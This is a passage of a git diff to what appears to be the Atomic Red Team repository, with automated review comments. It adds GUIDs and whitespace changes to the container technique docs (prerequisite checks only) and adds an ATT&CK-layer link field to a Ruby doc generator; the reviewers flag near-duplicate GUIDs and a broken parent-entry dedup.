+++ b/atomics/T1610/T1610.md
@@ -21,6 +21,10 @@ Additional Details:
**Supported Platforms:** Linux
+**auto_generated_guid:** 58004e22-022c-4c51-b4a8-2b85ac5c596b
+
+
+
@@ -42,7 +46,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
##### Description: Verify docker is installed.
##### Check Prereq Commands:
```sh
-which docker
+which docker
```
##### Get Prereq Commands:
```sh
@@ -51,7 +55,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt
##### Description: Verify docker service is running.
##### Check Prereq Commands:
```sh
-sudo systemctl status docker
+sudo systemctl status docker
```
##### Get Prereq Commands:
```sh
@@ -60,7 +64,7 @@ sudo systemctl start docker
##### Description: Verify kind is in the path.
##### Check Prereq Commands:
```sh
-which kind
+which kind
```
##### Get Prereq Commands:
```sh
@@ -71,7 +75,7 @@ mv kind /usr/bin/kind
##### Description: Verify kind-atomic-cluster is created
##### Check Prereq Commands:
```sh
-sudo kind get clusters
+sudo kind get clusters
```
##### Get Prereq Commands:
```sh
@@ -80,7 +84,7 @@ sudo kind create cluster --name atomic-cluster
##### Description: Verify kubectl is in path
##### Check Prereq Commands:
```sh
-which kubectl
+which kubectl
```
##### Get Prereq Commands:
```sh
diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md
index 44fbe47a..910e11e7 100644
--- a/atomics/T1611/T1611.md
+++ b/atomics/T1611/T1611.md
@@ -21,6 +21,10 @@ Additional Details:
**Supported Platforms:** Linux
+**auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff
+
+
+
@@ -42,7 +46,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
##### Description: Verify docker is installed.
##### Check Prereq Commands:
```sh
-which docker
+which docker
```
##### Get Prereq Commands:
```sh
@@ -51,7 +55,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt
##### Description: Verify docker service is running.
##### Check Prereq Commands:
```sh
-sudo systemctl status docker
+sudo systemctl status docker
```
##### Get Prereq Commands:
```sh
@@ -60,7 +64,7 @@ sudo systemctl start docker
##### Description: Verify kind is in the path.
##### Check Prereq Commands:
```sh
-which kind
+which kind
```
##### Get Prereq Commands:
```sh
@@ -71,7 +75,7 @@ mv kind /usr/bin/kind
##### Description: Verify kind-atomic-cluster is created
##### Check Prereq Commands:
```sh
-sudo kind get clusters
+sudo kind get clusters
```
##### Get Prereq Commands:
```sh
@@ -80,7 +84,7 @@ sudo kind create cluster --name atomic-cluster
##### Description: Verify kubectl is in path
##### Check Prereq Commands:
```sh
-which kubectl
+which kubectl
```
##### Get Prereq Commands:
```sh
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index e9c19f64..b94da380 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -709,3 +709,20 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
c33f3d80-5f04-419b-a13a-854d1cbdbf3a
126f71af-e1c9-405c-94ef-26a47b16c102
da4f751a-020b-40d7-b9ff-d433b7799803
+c35ac4a8-19de-43af-b9f8-755da7e89c89
+002cca30-4778-4891-878a-aaffcfa502fa
+42f22b00-0242-4afc-a61b-0da05041f9cc
+c89becbe-1758-4e7d-a0f4-97d2188a23e3
+8fd5a296-6772-4766-9991-ff4e92af7240
+7e91138a-8e74-456d-a007-973d67a0bb80
+437b2003-a20d-4ed8-834c-4964f24eec63
+4f08197a-2a8a-472d-9589-cd2895ef22ad
+d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+812c3ab8-94b0-4698-a9bf-9420af23ce24
+afedc8c4-038c-4d82-b3e5-623a95f8a612
+c99a829f-0bb8-4187-b2c6-d47d1df74cab
+b4988cad-6ed2-434d-ace5-ea2670782129
+8822c3b0-d9f9-4daf-a043-491160a31122
+8822c3b0-d9f9-4daf-a043-49f110a31122
+8d1c2368-b503-40c9-9057-8e42f21c58ad
+649349c7-9abf-493b-a7a2-b1aa4d141528
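Review bot: Two of the added identifiers, `8822c3b0-d9f9-4daf-a043-491160a31122` and `8822c3b0-d9f9-4daf-a043-49f110a31122`, share their first four groups with `8822c3b0-d9f9-4daf-a043-49f4602364f4` used in T1564.004.md earlier in this diff, which is not what a random UUID generator produces and suggests hand-edited values. If these are meant to be unique test keys, regenerating them with the tool that maintains this list (or `SecureRandom.uuid`) avoids near-collisions where a typo is indistinguishable from a distinct test. This may simply be recorded history of already-consumed values; worth confirming before merge.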
diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb
index 83ee3678..3e4e0078 100755
--- a/bin/generate-atomic-docs.rb
+++ b/bin/generate-atomic-docs.rb
@@ -63,7 +63,6 @@ class AtomicRedTeamDocs
def generate_technique_docs!(atomic_yaml, output_doc_path)
technique = ATTACK_API.technique_info(atomic_yaml.fetch('attack_technique'))
technique['identifier'] = atomic_yaml.fetch('attack_technique').upcase
-
template = ERB.new File.read("#{ATOMIC_RED_TEAM_DIR}/atomic_doc_template.md.erb"), nil, "-"
generated_doc = template.result(binding)
@@ -135,7 +134,7 @@ class AtomicRedTeamDocs
puts "Generated Atomic Red Team index at #{output_doc_path}"
end
-
+
#
# Generates a master Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests
#
@@ -213,12 +212,14 @@ class AtomicRedTeamDocs
technique = {
"techniqueID" => atomic_yaml['attack_technique'],
"score" => 100,
- "enabled" => true
+ "enabled" => true,
+ "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"
}
techniqueParent = {
"techniqueID" => atomic_yaml['attack_technique'].split('.')[0],
"score" => 100,
- "enabled" => true
+ "enabled" => true,
+ "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"
}
techniques.push(technique)
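Review bot: The `"comment"` added to `techniqueParent` is built from the full `atomic_yaml['attack_technique']`, so a parent entry whose `techniqueID` is `T1574` links to the sub-technique's page (e.g. `T1574.001/T1574.001.md`), and because the comment now differs per sub-technique, the `unless techniques_win.include?(techniqueParent)` dedup in the next hunk (`@@ -231,16 +232,16 @@`, and its macOS/Linux twins) no longer recognises the parent as already present, so each sub-technique pushes another parent entry into the layer. Deriving the link from the parent id keeps the hashes equal across sub-techniques and the dedup working: `"comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/#{atomic_yaml['attack_technique'].split('.')[0]}/#{atomic_yaml['attack_technique'].split('.')[0]}.md"`, assuming the parent technique has its own doc as T1564 does in this diff. The duplicated URL construction on both hashes would also read better as one small helper. The enclosing method starts and ends outside this hunk.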
@@ -231,16 +232,16 @@ class AtomicRedTeamDocs
if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then has_macos_tests = true end
if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^(?!windows|macos).*$/} then has_linux_tests = true end
end
- if has_windows_tests then
- techniques_win.push(technique)
+ if has_windows_tests then
+ techniques_win.push(technique)
techniques_win.push(techniqueParent) unless techniques_win.include?(techniqueParent)
end
- if has_macos_tests then
- techniques_mac.push(technique)
+ if has_macos_tests then
+ techniques_mac.push(technique)
techniques_mac.push(techniqueParent) unless techniques_mac.include?(techniqueParent)
end
- if has_linux_tests then
- techniques_lin.push(technique)
+ if has_linux_tests then
+ techniques_lin.push(technique)
techniques_lin.push(techniqueParent) unless techniques_lin.include?(techniqueParent)
end
end